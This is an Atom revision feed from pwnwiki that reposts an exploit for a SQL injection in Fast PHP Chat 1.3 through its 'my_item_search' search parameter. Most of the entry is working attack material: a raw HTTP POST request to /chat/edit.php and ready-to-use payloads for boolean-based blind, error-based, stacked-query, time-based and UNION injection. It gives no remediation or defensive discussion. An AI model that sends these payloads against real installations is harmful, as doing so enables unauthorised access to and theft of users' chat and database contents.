<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Fast_PHP_Chat_1.3_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E</id>
	<title>Fast PHP Chat 1.3 SQL注入漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Fast_PHP_Chat_1.3_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Fast_PHP_Chat_1.3_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-07T08:16:46Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Fast_PHP_Chat_1.3_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=1845&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: Fast PHP Chat 1.3 - 'my_item_search' SQL Injection # Date: 15/04/2021 # Exploit Author: Fatih Coskun # Vendor Homepage: https://codecanyon.net/i...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Fast_PHP_Chat_1.3_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=1845&amp;oldid=prev"/>
		<updated>2021-04-21T10:04:28Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: Fast PHP Chat 1.3 - &amp;#039;my_item_search&amp;#039; SQL Injection # Date: 15/04/2021 # Exploit Author: Fatih Coskun # Vendor Homepage: https://codecanyon.net/i...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Fast PHP Chat 1.3 - 'my_item_search' SQL Injection&lt;br /&gt;
# Date: 15/04/2021&lt;br /&gt;
# Exploit Author: Fatih Coskun&lt;br /&gt;
# Vendor Homepage: https://codecanyon.net/item/fast-php-chat-responsive-live-ajax-chat/10721076&lt;br /&gt;
# Version: 1.3&lt;br /&gt;
# Category: Webapps&lt;br /&gt;
# Tested on: Kali linux&lt;br /&gt;
# Description : The vulnerability allows an attacker to inject sql commands from search section with 'my_item_search' parameter.&lt;br /&gt;
====================================================&lt;br /&gt;
&lt;br /&gt;
# PoC : SQLi :&lt;br /&gt;
&lt;br /&gt;
POST /chat/edit.php HTTP/1.1&lt;br /&gt;
Host: localhost&lt;br /&gt;
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101&lt;br /&gt;
Firefox/45.0&lt;br /&gt;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8&lt;br /&gt;
Accept-Language: en-US,en;q=0.5&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Referer: https://localhost/chat/edit.php&lt;br /&gt;
Cookie: PHPSESSID=9a04fe702b8ff82c1199590d7c286e1c;&lt;br /&gt;
_ga=GA1.2.1275939122.1527132107; _gid=GA1.2.1709883568.1527132107&lt;br /&gt;
Connection: keep-alive&lt;br /&gt;
Content-Type: application/x-www-form-urlencoded&lt;br /&gt;
Content-Length: 40&lt;br /&gt;
my_item_search=test&amp;amp;submit_search=Search&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Parameter : my_item_search&lt;br /&gt;
&lt;br /&gt;
     Type : boolean-based blind&lt;br /&gt;
     Demo : https://localhost/chat/edit.php&lt;br /&gt;
  Payload : my_item_search=-2454' OR 6122=6122#&amp;amp;submit=Search&lt;br /&gt;
&lt;br /&gt;
     Type : error-based&lt;br /&gt;
     Demo : https://localhost/chat/edit.php&lt;br /&gt;
  Payload : my_item_search=test' AND (SELECT 3274 FROM(SELECT&lt;br /&gt;
COUNT(*),CONCAT(0x71706a7071,(SELECT&lt;br /&gt;
(ELT(3274=3274,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM&lt;br /&gt;
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hbeW&amp;amp;submit=Search&lt;br /&gt;
&lt;br /&gt;
     Type : stacked queries&lt;br /&gt;
     Demo : https://localhost/chat/edit.php&lt;br /&gt;
  Payload : my_item_search=test';SELECT SLEEP(5)#&amp;amp;submit=Search&lt;br /&gt;
&lt;br /&gt;
     Type : AND/OR time-based blind&lt;br /&gt;
     Demo : https://localhost/login-script-demo/users.php&lt;br /&gt;
  Payload : my_item_search=test' OR SLEEP(5)-- mlod&amp;amp;submit=Search&lt;br /&gt;
&lt;br /&gt;
     Type : UNION query&lt;br /&gt;
     Demo : https://localhost/chat/edit.php&lt;br /&gt;
  Payload : my_item_search=test' UNION ALL SELECT&lt;br /&gt;
NULL,CONCAT(0x71706a7071,0x4c5a6241667667676e4f6658775348795675704b557871675a5542646273574e5359776668534a71,0x7162716b71),NULL,NULL,NULL,NULL#&amp;amp;submit=Search&lt;br /&gt;
&lt;br /&gt;
====================================================&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>